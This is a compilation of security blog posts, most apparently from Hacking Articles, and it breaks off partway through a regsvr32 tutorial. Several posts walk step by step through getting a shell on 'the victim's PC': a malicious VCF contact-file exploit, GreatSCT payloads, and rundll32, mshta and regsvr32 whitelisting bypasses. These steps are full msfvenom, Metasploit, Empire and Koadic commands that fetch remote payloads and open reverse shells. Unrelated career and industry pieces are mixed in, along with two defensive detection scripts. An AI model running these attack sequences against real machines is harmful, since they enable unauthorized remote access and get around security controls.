Note that our parent folder's name is "Raj" and the malicious VBS file is "shell.vbs".

Now add this email address by clicking the Add button. As you can see, it will look something like this:

Once the email address gets added, you’ll have to save the contact file. The final VCF file is going to look something like this:

With the aforementioned HTML injection tag, we are prompting a local file inclusion instead of a mail prompt. This will run the malicious code and thereby, in theory, spawn meterpreter. So, as soon as we add the mail to the VCF file, Windows will prompt: "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" Click Yes.

When you click on the mail in the final processed VCF file, you will most likely have a new meterpreter session.

Conclusion: This is an amazing vulnerability discovered by John Page, and all versions of Windows that support contact VCF files are affected by it. As you can see, we have spawned a Windows 10 shell here, so it is safe to say that lower versions are affected too. To read more about the discovery, follow the link to John Page's website here. Thanks for reading.

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker.

The post Exploiting Windows using Contact File HTML Injection/RCE appeared first on Hacking Articles.

Top 8 Tools Every Ethical Hacker Should Know [Infographic]

Ethical Hackers rely on a variety of tools to test their clients’ systems, networks, and applications. Find out what are the most commonly used tools that every ethical hacker should know.


Want to learn how to use these pentesting tools? Get a free trial of our Penetration Testing Professional (PTP) training course to learn how to perform detailed enumeration, privilege escalation and restricted shell escaping:


Exploiting Windows PC using Malicious Contact VCF file

A huge shoutout to cyber security researcher John Page for bringing this vulnerability to the internet’s attention on 15th January 2019. This was a 0-day exploit and of course works on the latest Windows 10 too. It is categorized as an “Insufficient UI warning remote code execution” vulnerability.

Introduction: Basically, what John discovered was that if we replace the website in a VCF file with the local path of a CPL file, Windows launches that file instead of opening it in the browser. This is done by replacing “http://” with “http.\\”, which is remarkably subtle: a user would need extraordinarily sharp eyes to spot an intentional path error of that kind! So all we need to do is send the victim the VCF file along with our CPL file in a folder named “http” (it has to be “http” for the local path inclusion to work) and we get a shell.

To read more about the research follow the link here.

Methodology:

  • Making an msfvenom Windows payload with a .dll extension.
  • Sending the DLL file in a folder named “http”.
  • Creating a contact file in the parent folder of “http”.
  • Adding a website to the contact.
  • Changing the website prefix from http:// to http.\\
  • Renaming the DLL file to “<name of website>.cpl”
  • Running multi/handler in a terminal window
  • Opening the website path from the contact
  • Spawning a shell.

Proof of Concept:

The first step is to make a payload with a .dll extension. For this purpose we are using msfvenom’s Windows payload, but any other payload should work just fine.

In this case my local IP address is 192.168.1.109.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f dll > shell.dll

Next we transfer this payload to the victim machine in a new folder named http. This has to be http and nothing else, since we include it as a path later on in the website link. And it has to be in the current directory too. So we copy this shell.dll file onto the victim machine.

Next, and most important, is to create a contact (VCF) file. You can download a sample VCF and edit it, but we created a new contact file. Our system is Windows 10, so the version of the VCF file may differ from yours, but it will work just the same.

Add any name in the contact file.

I added Raj Chandel.

Go to the next tab, Home, and you’ll see a text box for a website. Add any website name you like. I added my website’s name, “hackingarticles.in”, but here is the most important thing to note:

A normal website link is https://www.hackingarticles.in, but we modify the prefix just a little by replacing the http:// with http.\\

This is because we don’t actually want to include a website; we want to include the path to our DLL file, so that when the victim clicks on the website our DLL runs.

Here we suffix the website link with the “.cpl” extension. A CPL file is a control panel item, such as Display, Mouse, Sound or Networking, used by the Windows operating system.

Save the contact. Now rename our payload from shell.dll to “www.hackingarticles.in.cpl”

Now we are prepped and ready to run the DLL, so we set up multi/handler in a terminal window and open the contact on the victim’s machine.

As soon as we click on the link, a session is obtained in the Kali terminal!

This spawns a shell as the Windows user currently logged on.

Conclusion: This is an amazing vulnerability discovered by John Page, and all working versions of Windows that support contact VCF files are affected by it. As you can see we have spawned a Windows 10 shell here, so it is safe to say older versions are affected too. To read more about the discovery, follow the link to John Page’s website here. Thanks for reading.
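As a defensive counterpart to both contact-file posts (the HTML-injection variant and the http.\\ variant), here is an added scanner, not part of the original articles or John Page’s research, that parses vCard text and flags URL and EMAIL values carrying HTML markup, a scheme look-alike such as http.\\, a bare local path, or an executable extension. The sample vCard is constructed for this example; the flagged values mirror the ones quoted in the posts, and vCard escaping is deliberately not decoded.

```python
"""Flag suspicious link fields in vCard (.vcf) text.

Added example for this page; it is not John Page's proof of concept or
Hacking Articles' code. Values are checked as raw text (vCard escaping
is not decoded), which is enough for the lures described in the posts.
"""
import re

# File types Windows hands to a loader or script host instead of a browser.
RISKY_EXTENSIONS = (".cpl", ".dll", ".vbs", ".vbe", ".js", ".jse", ".wsf",
                    ".hta", ".sct", ".exe", ".scr", ".bat", ".cmd", ".ps1")
# The only prefixes a contact's website or e-mail link should carry.
SAFE_SCHEMES = ("http://", "https://", "mailto:")
HREF_RE = re.compile(r'href\s*=\s*["\']?([^"\'>\s]+)', re.IGNORECASE)
LOOKALIKE_RE = re.compile(r"^https?\.[\\/]")   # http.\\ or http./ instead of http://


def unfold(text):
    """Join folded vCard lines: a continuation line starts with a space or tab."""
    lines = []
    for raw in text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_vcard(text):
    """Yield (PROPERTY, value) pairs; parameters such as ;TYPE=HOME are dropped."""
    for line in unfold(text):
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        yield name.split(";", 1)[0].strip().upper(), value.strip()


def classify(value):
    """Return the reasons a URL/EMAIL value looks like a local-inclusion lure."""
    reasons = []
    target = value.strip()
    lower = target.lower()
    if "<a " in lower and "href=" in lower:
        reasons.append("html-markup-in-field")
        m = HREF_RE.search(target)
        if m:                      # judge the href target, not the visible text
            target = m.group(1)
            lower = target.lower()
    if LOOKALIKE_RE.match(lower):
        reasons.append("scheme-lookalike")
    elif not lower.startswith(SAFE_SCHEMES) and ("\\" in target or lower.startswith("file:")):
        reasons.append("local-path")
    if lower.split("?", 1)[0].endswith(RISKY_EXTENSIONS):
        reasons.append("executable-extension")
    return reasons


def scan_vcard(text):
    """Return [(property, value, reasons)] for every link field that trips a check."""
    findings = []
    for prop, value in parse_vcard(text):
        if prop in ("URL", "EMAIL"):
            reasons = classify(value)
            if reasons:
                findings.append((prop, value, reasons))
    return findings


# Constructed sample: the two lures from the posts plus one legitimate URL.
SAMPLE_VCF = r"""BEGIN:VCARD
VERSION:2.1
N:Chandel;Raj
FN:Raj Chandel
EMAIL;PREF;INTERNET:<a href="raj\shell.vbs">raj@gmail.com</a>
URL;HOME:http.\\www.hackingarticles.in.cpl
URL;WORK:https://www.hackingarticles.in
END:VCARD
"""

if __name__ == "__main__":
    for prop, value, reasons in scan_vcard(SAMPLE_VCF):
        print(f"{prop}: {value!r} -> {', '.join(reasons)}")
```

A mail gateway or endpoint scanner can apply the same checks to .vcf attachments before they reach Windows Contacts.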

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

The post Exploiting Windows PC using Malicious Contact VCF file appeared first on Hacking Articles.

Pros & Cons of a Career in Cybersecurity

Cybersecurity is becoming an increasingly popular career choice. Why, you wonder? Read below to find out what InfoSec professionals say are the pros and cons of a career in this field.


Sources: IT Governance, Beyond Trust, Quora

Aspiring to learn modern penetration testing skills and techniques? Check out our Penetration Testing Professional (PTP) training course, or get your free trial below.


Break Through Cybersecurity Complexity With New Rules, Not More Tools

Let’s be frank: Chief information security officers (CISOs) and security professionals all know cybersecurity complexity is a major challenge in today’s threat landscape. Other folks in the security industry know this too — although some don’t want to admit it. The problem is that amid increasing danger and a growing skills shortage, security teams are overwhelmed by alerts and the growing number of complex tools they have to manage. We need to change that, but how? By completely rethinking our assumptions.

The basic assumption of security up until now is that new threats require new tools. After 12 years at IBM Security, leading marketing teams and making continuous contact with our clients — and, most recently, as VP of product marketing — I’ve seen a lot of promising new technology. But in our rapidly diversifying industry, there are more specialized products to face every kind of threat in an expanding universe of attack vectors. Complexity is a hidden cost of all these marvelous products.

It’s not just security products that contribute to the cybersecurity complexity conundrum; digitization, mobility, cloud and the internet of things (IoT) all contribute to the complexity of IT environments, making security an uphill battle for underresourced security teams. According to Forrester’s “Global Business Technographics Security Survey 2018,” 31 percent of business and IT decision-makers ranked the complexity of the IT environment among the biggest security challenges they face, tied with the changing nature of threats as the most-cited challenge.

I’ll give you one more mind-boggling statistic to demonstrate why complexity is the enemy of security: According to IBM estimates, enterprises use as many as 80 different security products from 40 vendors. Imagine trying to build a clear picture with pieces from 80 separate puzzles. That’s what CISOs and security operations teams are being asked to do.

7 Rules to Help CISOs Reduce Cybersecurity Complexity

The sum of the parts is not greater than the whole. So, we need to escape the best-of-breed trap to handle the problem of complexity. Cybersecurity doesn’t need more tools; it needs new rules.

Complexity requires us as security professionals and industry partners to turn the old ways of thinking inside out and bring in fresh perspectives.

Below are seven rules to help us think in new ways about the complex, evolving challenges that CISOs, security teams and their organizations face today.

1. Open Equals Closed

You can’t prevent security threats by piling on more tools that don’t talk to each other and create more noise for overwhelmed analysts. Security products need to work in concert, and that requires integration and collaboration. An open, connected, cloud-based security platform that brings security products together closes the gaps that point products leave in your defenses.

2. See More When You See Less

Security operations centers (SOCs) see thousands of security events every day — a 2018 survey of 179 IT professionals found that 55 percent of respondents handle more than 10,000 alerts per day, and 27 percent handle more than 1 million events per day. SOC analysts can’t handle that volume.

According to the same survey, one-third of IT professionals simply ignore certain categories of alerts or turn them off altogether. A smarter approach to the overwhelming volume of alerts leverages analytics and artificial intelligence (AI) so SOC analysts can focus on the most crucial threats first, rather than chase every security event they see.

3. An Hour Takes a Minute

When you find a security incident that requires deeper investigation, time is of the essence. Analysts can’t afford to get bogged down in searching for information in a sea of threats.

Human intelligence augmented by AI — what IBM calls cognitive security — allows SOC analysts to respond to threats up to 60 times faster. An advanced AI can understand, reason and learn from structured and unstructured data, such as news articles, blogs and research papers, in seconds. By automating mundane tasks, analysts are freed to make critical decisions for faster response and mitigation.

4. A Skills Shortage Is an Abundance

It’s no secret that greater demand for cybersecurity professionals and an inadequate pipeline of traditionally trained candidates has led to a growing skills gap. Meanwhile, cybercriminals have grown increasingly collaborative, but those who work to defend against them remain largely siloed. Collaboration platforms for security teams and shared threat intelligence between vendors are force multipliers for your team.

5. Getting Hacked Is an Advantage

If you’re not seeking out and patching vulnerabilities in your network and applications, you’re making an assumption that what you don’t know can’t hurt you. Ethical hacking and penetration testing turns hacking into an advantage, helping you find your vulnerabilities before adversaries do.

6. Compliance Is Liberating

More and more consumers say they will refuse to buy products from companies that they don’t trust to protect their data, no matter how great the products are. By creating a culture of proactive data compliance, you can exchange the checkbox mentality for continuous compliance, turning security into a competitive advantage.

7. Rigidity Is Breakthrough

The success of your business depends not only on customer loyalty, but also employee productivity. Balance security with productivity by practicing strong security hygiene. Run rigid but silent security processes in the background to stay out of the way of productivity.

What’s the bottom line here? Times are changing, and the current trend toward complexity will slow the business down, cost too much and fail to reduce cyber risk. It’s time to break through cybersecurity complexity and write new rules for a new era.


The post Break Through Cybersecurity Complexity With New Rules, Not More Tools appeared first on Security Intelligence.

GreatSct – An Application Whitelist Bypass Tool

While writing the AppLocker bypass series, we found a new tool designed specifically for bypassing application whitelisting. So I decided to write this article introducing another very interesting tool, “Great SCT – A Metasploit payload generator”, which is similar to Unicorn or msfvenom because it depends on the Metasploit framework to provide a reverse connection from the victim’s machine. So let’s begin with its tutorial and check its functionality.

Table of Content

  • GreatSCT
  • Installation & Usages
  • Generate malicious hta file
  • Generate malicious sct file
  • Generate malicious dll file

GreatSCT

GreatSCT is currently maintained by @ConsciousHacker; the project is called Great SCT (Great Scott). Great SCT is an open source project to generate application whitelist bypasses. It is intended for BOTH red and blue teams. It is designed to generate Metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

You can download it from here: https://github.com/GreatSCT/GreatSCT

Installation & Usages

Great SCT must first be downloaded and installed. Run the following commands to clone it from GitHub; the setup script also takes care of its dependencies:

git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
./setup.sh

It helps bypass AppLocker policy by using the following tools:

  • InstallUtil.exe : The Installer tool is a command-line tool that lets you install and uninstall server resources in specific assemblies by running the installer components.
  • MSBuild.exe : The Microsoft Build Engine, also known as MSBuild, is a platform for building applications.
  • Mshta.exe : Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA (HTML Application) files, HTML files from which we can run JavaScript or VBScript.
  • Regasm.exe : The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently.
  • RegSvcs.exe : RegSvcs stands for Microsoft .NET Remote Registry Services; it is known for .NET Services Installation.
  • Regsvr32.exe : Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls, in the Windows Registry.

Once it’s downloaded and running, type the following command to access the help commands:

use Bypass

Now to get the list of payloads type :

list

Generate malicious hta file 

Now, from the list of payloads, you can choose any one for your attack. For this attack we will use:

use mshta/shellcode_inject/base64_migrate.py

Once the command has executed, type:

generate

After the generate command runs, it asks which method you want to use. As we are going to use msfvenom, type 1 to choose the first option. Then press Enter for meterpreter. Then provide lhost and lport, i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it asks you to name the payload. By default it uses ‘payload’ as the name. As I didn’t want to give a name, I simply pressed Enter.

It then creates two files: a resource file and an HTA file.

Now, first start Python’s HTTP server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now execute the hta file in the command prompt of the victim’s PC.

mshta.exe http://192.168.1.107/payload.hta

Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using mshta.exe (Multiple Methods)” to learn more about mshta.exe techniques.

Generate malicious sct file 

Now, from the list of payloads, you can choose any one for your attack. For this attack we will use:

use regsvr/shellcode_inject/base64_migrate.py

Once the command has executed, type:

generate

Then it asks for a payload. Just press Enter, as it takes windows/meterpreter/reverse_tcp as the default payload, and that is the one we need. After that, provide the IP (here 192.168.1.107) and a port of your choice; as you can see in the image below, we have given lport as 2345.

After giving the details, it asks for a name for your malware. By default it sets the name ‘payload’, so either give a name or just press Enter for the default.

As soon as you press Enter it generates two files: a resource file and a .sct file.

Now start Python’s HTTP server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now execute the .sct file from the Run window of the victim’s PC as shown below:

regsvr32 /u /n /s /i:http://192.168.1.107/payload.sct scrobj.dll

Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Visit here “Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)” to learn more about regsvr32.exe techniques.

Generate malicious dll file 

Now, from the list of payloads, you can choose any one for your attack. For this attack we will use:

use regasm/meterpreter/rev_tcp.py

Once the command has executed, type:

set lhost 192.168.1.107
generate

After giving the details, it asks for a name for your malware. By default it sets the name ‘payload’, so either give a name or just press Enter for the default.

As soon as you press Enter it generates two files: a resource file and a .dll file.

Now start Python’s HTTP server in /usr/share/greatsct-output by typing:

python -m SimpleHTTPServer 80

Now place the generated DLL file inside C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute it from the Run window of the victim’s PC as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll

Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! You have your session.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post GreatSct – An Application Whitelist Bypass Tool appeared first on Hacking Articles.

Facebook opens up on System that ‘protects Billions’

Facebook used a blog post on Friday to describe, in detail, the systems that it uses to secure its vast social network, including custom designed tools and so-called "red team" hacks.

The post Facebook opens up on System that ‘protects Billions’ appeared first on The Security Ledger.


Bypass Application Whitelisting using rundll32.exe (Multiple Methods)

The purpose of this post is to demonstrate the most common and familiar AppLocker whitelisting bypass techniques. As we know, for security reasons the system admin adds group policies to restrict app execution for local users. In our previous article, “Windows Applocker Policy – A Beginner’s Guide”, we discussed how to define AppLocker rules for your application control policies and how to work with them. Today you will learn how to bypass AppLocker policies with rundll32 and DLL files.

Table of Contents

  • Introduction
  • Working of DLL files
  • Advantages
  • Disadvantages
  • Different methods for AppLocker Bypass using DLL files
  • Conclusion

Introduction

DLL files are important for the Windows OS to work, and they also determine how other programs that customize your Windows run. Dynamic Link Library (DLL) files provide instructions to other programs on how to call upon certain functionality. Therefore multiple programs can share such DLL files, even simultaneously. Despite being in the same format as an .exe file, DLL files are not directly executable like .exe files. DLL file extensions can be: .dll (Dynamic Link Library), .OCX (ActiveX Controls), .CPL (Control Panel), .DRV (Device Drivers).

Working

When in use, DLL files are divided into sections. This makes the working of DLL files easier and faster. Each section is loaded into the main program at run time. As each section is different and independent, load time is faster and a section is only loaded when the functionality of the said file is required. This ability also makes upgrades easier to apply without affecting other sections. For example, you have a dictionary program and new words are added every month; all you have to do is update the dictionary DLL, without having to install a whole new program.

Advantages

  • Uses fewer resources
  • Promotes modular architecture
  • Eases deployment and installation

Disadvantages

A program that depends on a DLL can break when:

  • A dependent DLL is upgraded to a new version.
  • A dependent DLL is fixed.
  • A dependent DLL is overwritten with an earlier version.
  • A dependent DLL is removed from the computer.

Methods

  • SMB Delivery
  • MSFVenom
  • Koadic
  • Get Command Prompt via cmd.dll
  • JSRat

SMB Delivery

Our first method uses smb_delivery. To use this method, open the terminal in Kali and type the following commands:

msfconsole

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107
msf exploit(windows/smb/smb_delivery) > exploit

Now run the malicious code through rundll32.exe on the Windows machine to obtain a meterpreter session.

Once the above module runs, it provides a command to be executed on the victim’s PC in order to get a session. So copy and paste that command into the Run window of the victim’s PC as shown in the image below:

rundll32.exe \\192.168.1.107\ZtmW\test.dll,0

As soon as the command is executed, you will have your meterpreter session. To access the session type:

sessions 1
sysinfo

MSFVenom

Our second method is via msfvenom. To use this method, type the following command in the Kali terminal:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll

Once the payload is created, run the following command in the Run window of the victim’s PC:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll

Simultaneously, start the multi/handler to get a session by typing:

msfconsole

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

Koadic

Our next method uses the Koadic framework. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. To know more about Koadic, please read our detailed article on the framework at this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once Koadic is up and running, type:

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
run

Running the exploit gives you a command. Copy that command (from rundll32.exe through to 6.0”)) and paste it into the command prompt of the victim’s PC.

Once you run the command in cmd, you will have your session, as shown in the following image.

To access the session type :

zombies 0

Get Command Prompt via cmd.dll 

Now the dilemma is: what to do if the command prompt is blocked on the victim’s PC?

If the command line is blocked, there is a script developed by Didier Stevens. You can find it at the following link:

http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip

Opening the above URL downloads a zip file. Extract it and use the following command to run the DLL from the Run window:

rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

As soon as you run the command, you will have an unblocked cmd, as shown below:

JSRat

Our next method uses JSRat, which you can download from GitHub. This is another very small command and control framework, like Koadic and PowerShell Empire, for generating malicious tasks only for rundll32.exe and regsvr32.exe. JSRat creates a web server, and on that web server we find our .js file. To use this method type:

./JSRat.py -i 192.168.1.107 -p 4444

Once JSRat starts, it gives you a link to open in a browser. That web page contains the code to be executed on the victim’s PC.

Therefore, open the http://192.168.1.107/wtf link in your browser. There you will find the code, as shown in the image below:

Run that code in the command prompt of the victim’s PC as shown:

And voila, you will have a session, as in the image below:

Conclusion

DLL files are collections of code and procedures held together. These files help Windows programs execute correctly. They were created so that multiple programs could use them simultaneously, which conserves memory. Therefore these files are important and required for Windows to run properly without causing users any problems. Hence, exploitation through such files is very efficient and lethal, and the methods presented above are different ways to do it.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Bypass Application Whitelisting using rundll32.exe (Multiple Methods) appeared first on Hacking Articles.

Bypass Application Whitelisting using regsrv32.exe (Multiple Methods)

The purpose of this post is to demonstrate the most common and familiar AppLocker whitelisting bypass techniques. As we know, for security reasons the system admin adds group policies to restrict app execution for local users. In our previous article, “Windows Applocker Policy – A Beginner’s Guide”, we discussed how to define AppLocker rules for your application control policies and how to work with them. Today you will learn how to bypass AppLocker policies with regsvr32.exe.

Table of Contents

  • Introduction to regsvr
  • Working of regsvr
  • Multiple methods to attack regsvr

Introduction

Regsvr32 stands for Microsoft Register Server. It is a Windows command-line utility. While regsvr32 sometimes causes problems, it is an important Windows system file. The file is found in a subfolder of C:\Windows. It is able to observe, track and influence other programs. It is mainly used to register and unregister programs in Windows. Its file extension is .exe, and its process widely assists OLE (Object Linking and Embedding), DLL (Dynamic Link Libraries) and OCX (ActiveX control modules). The process works in the background and can be seen via Task Manager. It is one of Microsoft’s trusted files.

Working

When you register a DLL file with regsvr32, information about the programs associated with it is added to Windows. These entries are then consulted to find where the program data is and how to interact with it. While registering a DLL file, information is added to a central directory so that it can be used by Windows. The full path of these files points at the executable code, and through this Windows can call specific functions and use them to run executable code. These files are very convenient: when software is updated, these entries automatically refer to the updated version, so in short they help avoid software version problems. Usually this utility is not used except for registering and unregistering DLL files.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

To know more about it, visit here: https://support.microsoft.com/en-us/help/249873/how-to-use-the-regsvr32-tool-and-troubleshoot-regsvr32-error-messages
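The options above are exactly what a detection rule keys on. The following added example, which is not Hacking Articles’, Metasploit’s or GreatSCT’s code, scores process-creation records for the command lines quoted in the rundll32, GreatSCT and regsvr32 posts: regsvr32 with a remote /i: scriptlet plus scrobj.dll, rundll32 loading a DLL from a UNC path or via shell32 Control_RunDLL from a user directory, mshta fetching an HTA over HTTP, and regasm /U. The "image|command line" record format, the sample events and the rule names are assumptions made for this example.

```python
"""Score Windows process-creation records for the LOLBin patterns in the posts.

Added example; not Hacking Articles', Metasploit's or GreatSCT's code.
Record format (assumed for this example): "image|command line", one per line.
"""
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")            # \\host\share\...
ARG_RE = re.compile(r'"[^"]*"|\S+')                # keep quoted runs together
SYSTEM_DIRS = ("c:\\windows\\", "%systemroot%", "%windir%")


def detect(image, cmdline):
    """Return the technique names the event matches; an empty list means no hit."""
    exe = image.rsplit("\\", 1)[-1].lower()
    args = [a.strip('"') for a in ARG_RE.findall(cmdline)][1:]   # drop argv[0]
    lower = [a.lower() for a in args]
    hits = []
    if exe == "regsvr32.exe":
        # squiblydoo: a remote /i: scriptlet executed through scrobj.dll
        remote_i = any(a.startswith("/i:") and URL_RE.match(a[3:]) for a in lower)
        if remote_i and "scrobj.dll" in lower:
            hits.append("regsvr32-squiblydoo")
    elif exe == "rundll32.exe":
        # DLL pulled straight from an SMB share (smb_delivery style)
        if args and UNC_RE.match(args[0]):
            hits.append("rundll32-unc-dll")
        # shell32 Control_RunDLL used to load a DLL/CPL outside the system tree
        if (len(args) >= 2 and lower[0] == "shell32.dll,control_rundll"
                and lower[1].endswith((".dll", ".cpl"))
                and not lower[1].startswith(SYSTEM_DIRS)):
            hits.append("rundll32-control_rundll-user-dll")
    elif exe == "mshta.exe":
        if any(URL_RE.match(a) for a in lower):
            hits.append("mshta-remote-hta")
    elif exe in ("regasm.exe", "regsvcs.exe"):
        # /U runs the assembly's uninstall code; tune with parent-process context
        if "/u" in lower:
            hits.append(exe[:-4] + "-uninstall-exec")
    return hits


def scan_events(lines):
    """Parse records and return [(command line, hits)] for the ones that match."""
    findings = []
    for line in lines:
        if "|" not in line:
            continue
        image, cmdline = line.split("|", 1)
        hits = detect(image.strip(), cmdline.strip())
        if hits:
            findings.append((cmdline.strip(), hits))
    return findings


# Constructed records; the command lines mirror the ones quoted in the posts.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\rundll32.exe|rundll32.exe \\192.168.1.107\ZtmW\test.dll,0",
    r"C:\Windows\System32\rundll32.exe|rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll",
    r"C:\Windows\System32\mshta.exe|mshta.exe http://192.168.1.107/payload.hta",
    r"C:\Windows\System32\regsvr32.exe|regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe|regasm.exe /U payload.dll",
    # benign look-alikes that must stay quiet
    r"C:\Windows\System32\regsvr32.exe|regsvr32 /s C:\Windows\System32\msxml3.dll",
    r"C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl",
    r'C:\Windows\System32\mshta.exe|mshta.exe "C:\Program Files\Vendor\setup.hta"',
]

if __name__ == "__main__":
    for cmdline, hits in scan_events(SAMPLE_EVENTS):
        print(f"{', '.join(hits):40} {cmdline}")
```

The same predicates translate directly into Sysmon event 1 or Security 4688 filters; the benign records show where the rules need the system-path and scheme checks to avoid noise.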

Multiple Methods

  • Web delivery
  • Empire
  • Manual
  • MSFVenom
  • Koadic
  • JSRat
  • GreatSCT

Web Delivery

This module quickly fires up a web server that serves a payload. The provided command allows a payload to download and execute, either through the specified scripting language interpreter or via “squiblydoo” with regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command, e.g. command injection.

Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request a .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

Copy the highlighted text shown below:

Once the exploit is running; you will have a URL made for you. Run that URL in the command prompt of the Victim’s PC as shown below:

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

Once you hit enter after the command, you will have your session. Type ‘sysinfo’ for the information of the PC as shown in the image below:

PowerShell Empire

For our next regsvr32 attack method we will use Empire. Empire is a post-exploitation framework. Until now we have paired our .sct attacks with Metasploit, but in this method we will use the Empire framework. It is a purely Python-based PowerShell Windows agent, which makes it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, @rvrsh3ll, @killswitch_gui and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

For a basic guide to Empire, please visit our article introducing Empire: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the Empire framework is started, type listeners to check whether there are any active listeners. As you can see in the image below, there are no active listeners. So to set up a listener, type:

uselistener http
set Host http://192.168.1.109
execute

With the above commands you will have an active listener. Type back to leave the listener menu so you can set up your PowerShell stager.

Once you are out of the listener menu, you need to use a stager to create your malicious file. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. This means that to create an exploit, we use a stager. Therefore, type:

usestager windows/launcher_sct
set listener http
execute

After the execute command runs, usestager creates launcher.sct in /tmp. Now, to get a session, start the Python server by typing:

python -m SimpleHTTPServer 8080

With the server up, the only step left is to execute our malware on the victim’s PC. For this, type the following command in the command prompt:

regsvr32 /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll

In the above command we have used port 8080 because our server of python is activated on the same port.

Once the above is executed as told, you will receive a session. To access the session type :

interact 9ATUX4M7

9ATUX4M7 is the agent/session name; it will vary from session to session.

Inject PowerShell code in sct File (Manual Method)

Our next method is manual, with the help of an exploit. The exploit we use will create our PowerShell code. So let’s first create the PowerShell, and for this go to the Kali terminal and type:

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

After running this exploit, it shows the PowerShell code on the terminal screen as in the following image. Copy the highlighted text shown below:

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

Now we need to create a .sct file for our attack to run. We found a script online that creates a .sct file; you can access the script by clicking here. The script is shown in the image below.

Copy the PowerShell code created by web_delivery and paste it into the above script where it says “calc.exe”, as shown in the image below, and then save it with the .sct extension.

Then repeat the earlier step to run the .sct file with regsvr32.exe on the victim’s PC:

regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll

As soon as the above command is executed, you will have your session through web_delivery. To access the session type ‘sessions 1’, then ‘info’ for basic information about the system.

MsfVenom

Our next method is to use msfvenom. Through this method we will create two .sct files: one to download our malware and another to execute it. But first let’s get going with msfvenom; for that, type:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

Start up the Python server using the following command:

python -m SimpleHTTPServer 80

